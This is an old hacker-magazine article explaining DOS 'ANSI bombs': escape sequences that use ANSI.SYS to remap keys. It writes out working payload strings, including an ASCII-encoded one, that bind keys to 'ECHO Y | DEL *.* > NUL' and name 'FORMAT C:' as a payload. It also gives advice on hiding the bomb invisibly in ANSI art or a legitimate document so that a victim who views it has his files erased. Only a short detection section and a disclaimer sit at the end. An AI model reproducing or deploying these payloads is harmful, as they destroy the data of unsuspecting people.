ANSI Bomb

by Mister Galaxy

As you know, ANSI codes are used to design colorful screens for BBSes.  These same ANSI codes can be used to redefine the keys of a keyboard (your keyboard or that of your victim).  For example, you could use ANSI codes to redefine your F10 key as the Enter key.  When you pressed the F10 key, it would be the same as pressing your Enter key.

You can also use ANSI codes to redefine a key as a DOS command.  This is where the power of ANSI bombs comes into play.  Think about what damage could be done by redefining your W key as a FORMAT command.  When you hit W, the computer would spit out a DEL or FORMAT command and, before you knew it, you'd be crushed!

What's Required?

First of all you must have the command DEVICE=ANSI.SYS (or its equivalent) in your CONFIG.SYS file.  If you don't know how to do this you shouldn't be reading this article!

Second, you need a chart of ASCII codes.  This can usually be found in the back of most DOS manuals.

Third, you need the following information.

How Do I Make a Bomb?

There are many ways to make a bomb.  The first way is to use the DOS PROMPT command.  For example, you could use this command in an AUTOEXEC.BAT file:

PROMPT $E[65;13;"ECHO Y | DEL *.* > NUL";13p

Note the special characters:

$E is another way to tell DOS you are referring to the ESC character.

[ must appear after the ESC character.

ASCII Code 65 is the A character.

ASCII Code 13 is the Carriage Return (Enter) code.

The above command redefines the "A" character as the following command:

HIT RETURN REDEFINE "A" AS ECHO Y | DEL *.* > NUL HIT RETURN

Get the idea?  Pretty dangerous!  Unfortunately, any poor sap who looks in his AUTOEXEC.BAT file will quickly notice this.

Another Way to Make a Bomb

Go into your MS-DOS 5.0 editor.  Type Ctrl-P, let go, and then hit the Esc key.  If you did this right, a Left Arrow will appear.  For our purposes, we will use ESC to symbolize the escape character (the Left Arrow).  Type the following:

ESC[;13;"HELLO";13p

where ESC is that Left Arrow.

This command would redefine your Enter key as:

HIT RETURN TYPE HELLO HIT RETURN

Once again, it's fairly obvious what is going on.  Now on to the sneaky stuff.

Essentially, the important thing to remember is that you can make an ANSI bomb execute any command you could type in DOS.  That's important.  Secondly, you can hide that command in a series of codes.  Please note the two following commands (they are important in the making of ANSI bombs):

ECHO Y | FORMAT C: > NUL and ECHO Y | DEL *.* > NUL

These two commands can cause great damage, and when they are embedded in ANSI codes within a picture or document, they can cause great destruction.  Imagine the problems you could cause by showing someone a picture...

Let's get to the meat of the matter.  To make a dangerous text file, type:

ESC[13;13;101;99;104;111;32;121;32;124;32;100;101;108;32;42;46;42;32;62;32;110;117;108;13p

Note:  Normally this ANSI code would be all on one line with no spaces or carriage returns.  If you do not have the MS-DOS 5.0 editor, try typing Alt+27 to generate the ESC character.

Anyway, the above command would redefine the Enter key as:

HIT RETURN ECHO Y | DEL *.* > NUL HIT RETURN

The 13p at the end of the command hits the Enter key (thereby executing the command).

Remember, you can use ANSI bombs to redefine one or many keys when it is viewed.  By viewed, I mean:

TYPE FILENAME.EXT

By simply viewing a file which contains an ANSI bomb (using the DOS TYPE command), you could possibly have your keys redefined!  Remember, it's possible that a BBS sysop could even redefine your keys over the phone just by having you look at a picture!

Hypothetically, if you were a sysop you could create a great ANSI using TheDraw ANSI editor.  It might say "GO AWAY" in big letters.  The sysop might use this "picture" when logging off troublesome individuals.  After the picture has been made, load it into the MS-DOS 5.0 editor.  Go to the end of the document.  Type in your ANSI bomb!  Save it.  The next time a troublesome individual calls, you might be able to zap him by redefining his keys via the modem!  But many communications packages appear to filter out these escape character combinations.  The best way to get your victim is to add an ANSI bomb to a legitimate document in a program that he wants to have.  When he views the document using the TYPE command, he will redefine one or more of his keys and will be zapped!

Remember, these bombs are completely invisible to anyone doing a TYPE FILENAME.EXT!  However, it will only be invisible if he has the ANSI.SYS driver active.  Most people do.  Your bomb will appear as gibberish to someone who does not have the ANSI.SYS driver active and it will not work on that particular machine.  In both cases, neither realizes what is going on.

How to Detect or Prevent ANSI Bombs

Get the programs PKSFANI1.ZIP, ANSICHEK.ZIP, or ACHKFILE.EXE.  The first stops key redefinitions and the others locate them in non-executable files.

Conclusion

This article was provided as an educational essay on the redefinition of keys.  There is nothing here which does not appear in any DOS manual - it’s just explained differently.  The writer and 2600 Magazine do not recommend that you do anything illegal or destructive with this information.  In fact, it is recommended that you do not attempt to follow any of the above instructions.